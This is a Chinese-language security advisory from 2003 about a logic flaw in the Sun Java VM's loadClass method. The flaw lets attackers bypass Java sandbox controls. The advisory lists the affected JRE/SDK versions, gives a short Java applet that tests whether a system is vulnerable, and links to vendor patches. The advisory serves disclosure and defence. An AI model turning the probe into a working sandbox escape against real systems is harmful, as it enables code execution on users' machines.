发布时间:2003-10-22
更新时间:2003-11-06
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8879
受影响系统 HP HP-UX 11.0
HP HP-UX 11.11
HP HP-UX 11.22
HP HP-UX 11.23
Sun JRE (Linux Production Release) 1.2.2 _015
Sun JRE (Linux Production Release) 1.2.2 _014
Sun JRE (Linux Production Release) 1.2.2 _013
Sun JRE (Linux Production Release) 1.2.2 _011
Sun JRE (Linux Production Release) 1.2.2 _010
Sun JRE (Linux Production Release) 1.2.2 _007
Sun JRE (Linux Production Release) 1.2.2 _006
Sun JRE (Linux Production Release) 1.2.2 _005
-Debian Linux 2.2
-MandrakeSoft Linux Mandrake 7.2
-RedHat Linux 7.0
-S.u.S.E. Linux 7.0
Sun JRE (Linux Production Release) 1.2.2 _004
Sun JRE (Linux Production Release) 1.2.2 _003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Linux Production Release) 1.3.1 _07
Sun JRE (Linux Production Release) 1.3.1 _06
Sun JRE (Linux Production Release) 1.3.1 _05
Sun JRE (Linux Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1 _02
Sun JRE (Linux Production Release) 1.3.1 _01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.4.1 _03
Sun JRE (Linux Production Release) 1.4.1 _02
Sun JRE (Linux Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Reference Release) 1.2.2 _011
Sun JRE (Reference Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2 _014
Sun JRE (Solaris Production Release) 1.2.2 _013
Sun JRE (Solaris Production Release) 1.2.2 _012
Sun JRE (Solaris Production Release) 1.2.2 _011
Sun JRE (Solaris Production Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.3.1 _07
Sun JRE (Solaris Production Release) 1.3.1 _06
Sun JRE (Solaris Production Release) 1.3.1 _05
Sun JRE (Solaris Production Release) 1.3.1 _04
Sun JRE (Solaris Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1 _02
Sun JRE (Solaris Production Release) 1.3.1 _01
Sun JRE (Solaris Production Release) 1.4.1 _03
Sun JRE (Solaris Production Release) 1.4.1 _02
Sun JRE (Solaris Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.2.2 _015
Sun JRE (Windows Production Release) 1.2.2 _014
Sun JRE (Windows Production Release) 1.2.2 _013
Sun JRE (Windows Production Release) 1.2.2 _011
Sun JRE (Windows Production Release) 1.2.2 _010
Sun JRE (Windows Production Release) 1.2.2
Sun JRE (Windows Production Release) 1.3.1 _07
Sun JRE (Windows Production Release) 1.3.1 _06
Sun JRE (Windows Production Release) 1.3.1 _05
Sun JRE (Windows Production Release) 1.3.1 _04
Sun JRE (Windows Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1 _02
Sun JRE (Windows Production Release) 1.3.1 _01a
Sun JRE (Windows Production Release) 1.3.1 _01
Sun JRE (Windows Production Release) 1.4.1 _03
Sun JRE (Windows Production Release) 1.4.1 _02
Sun JRE (Windows Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
+Opera Software Opera Web Browser 7.11 j
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.2 _01
Sun SDK (Linux Production Release) 1.2.2 _13
Sun SDK (Linux Production Release) 1.2.2 _12
Sun SDK (Linux Production Release) 1.2.2 _015
Sun SDK (Linux Production Release) 1.2.2 _014
Sun SDK (Linux Production Release) 1.2.2 _011
Sun SDK (Linux Production Release) 1.2.2 _010
Sun SDK (Linux Production Release) 1.3.1 _07
Sun SDK (Linux Production Release) 1.3.1 _06
Sun SDK (Linux Production Release) 1.3.1 _05
Sun SDK (Linux Production Release) 1.3.1 _03
Sun SDK (Linux Production Release) 1.3.1 _02
Sun SDK (Linux Production Release) 1.3.1 _01
Sun SDK (Linux Production Release) 1.4.1 _03
Sun SDK (Linux Production Release) 1.4.1 _02
Sun SDK (Linux Production Release) 1.4.1 _01
Sun SDK (Linux Production Release) 1.4.1
Sun SDK (Solaris Production Release) 1.2.2 _14
Sun SDK (Solaris Production Release) 1.2.2 _13
Sun SDK (Solaris Production Release) 1.2.2 _12
Sun SDK (Solaris Production Release) 1.2.2 _11
Sun SDK (Solaris Production Release) 1.2.2 _10
Sun SDK (Solaris Production Release) 1.2.2 _07a
Sun SDK (Solaris Production Release) 1.2.2
Sun SDK (Solaris Production Release) 1.3.1 _07
Sun SDK (Solaris Production Release) 1.3.1 _06
Sun SDK (Solaris Production Release) 1.3.1 _05
Sun SDK (Solaris Production Release) 1.3.1 _03
Sun SDK (Solaris Production Release) 1.3.1 _02
Sun SDK (Solaris Production Release) 1.3.1 _01
Sun SDK (Solaris Production Release) 1.4.1 _03
Sun SDK (Solaris Production Release) 1.4.1 _02
Sun SDK (Solaris Production Release) 1.4.1 _01
Sun SDK (Solaris Production Release) 1.4.1
Sun SDK (Solaris Reference Release) 1.2.2 _015
Sun SDK (Solaris Reference Release) 1.2.2 _014
Sun SDK (Solaris Reference Release) 1.2.2 _013
Sun SDK (Solaris Reference Release) 1.2.2 _012
Sun SDK (Solaris Reference Release) 1.2.2 _011
Sun SDK (Solaris Reference Release) 1.2.2 _010
Sun SDK (Windows Production Release) 1.2.2 _015
Sun SDK (Windows Production Release) 1.2.2 _014
Sun SDK (Windows Production Release) 1.2.2 _013
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _011
Sun SDK (Windows Production Release) 1.2.2 _010
Sun SDK (Windows Production Release) 1.3.1 _07
Sun SDK (Windows Production Release) 1.3.1 _06
Sun SDK (Windows Production Release) 1.3.1 _05
Sun SDK (Windows Production Release) 1.3.1 _04
Sun SDK (Windows Production Release) 1.3.1 _03
Sun SDK (Windows Production Release) 1.3.1 _02
Sun SDK (Windows Production Release) 1.3.1 _01a
Sun SDK (Windows Production Release) 1.4.1 _03
Sun SDK (Windows Production Release) 1.4.1 _02
Sun SDK (Windows Production Release) 1.4.1 _01
Sun SDK (Windows Production Release) 1.4.1
详细描述
Sun Java虚拟机在loadClass方法的实现上存在逻辑缺陷
,攻击者可以利用此
漏洞绕过Java的
安全控制
,在主机上执行任意代码
。
测试代码
Alla Bezroutchko <alla@scanit.be>
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
解决方案
厂商已经在新版软件中修补了此
漏洞:
http://java.sun.com/j2se/
相关信息
[LSD] Security vulnerability in SUN's Java Virtual Machine implementation
http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html
Sun Alert ID: 57221
cgi/retrieve.pl?doc=fsalert%2F57221">
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221